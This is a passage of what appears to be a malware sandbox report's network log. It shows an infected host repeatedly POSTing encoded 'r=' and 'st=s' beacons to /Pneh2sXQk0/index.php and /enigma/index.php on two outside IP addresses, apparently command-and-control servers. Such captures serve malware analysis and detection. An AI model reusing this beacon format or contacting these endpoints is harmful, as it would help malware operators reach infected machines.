                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:39.988127947 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1238192.168.2.551092193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:40.054984093 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:40.298554897 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1239192.168.2.551093193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:40.339138985 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:40.590775967 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1240192.168.2.551094193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:40.641285896 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:40.879576921 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1241192.168.2.551095193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:40.844264030 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:41.097969055 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1242192.168.2.551096193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:41.132138968 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:41.384892941 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1243192.168.2.551097193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:41.444936037 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:41.689177990 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1244192.168.2.551098193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:41.718980074 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:41.957983017 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1245192.168.2.551099193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:41.940107107 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:42.188263893 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1246192.168.2.551100193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:42.201462984 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:42.446005106 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1247192.168.2.551101193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:42.541807890 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:42.783881903 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1248192.168.2.551102193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:42.793826103 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:43.045520067 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1249192.168.2.551103193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:43.036031008 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:43.289499044 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1250192.168.2.551104193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:43.298332930 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:43.551084042 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1251192.168.2.551105193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:43.650918007 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:43.895411015 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1252192.168.2.551106193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:43.903001070 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:44.154500961 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1253192.168.2.551107193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:44.151081085 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:44.402163982 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1254192.168.2.551108193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:44.409887075 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
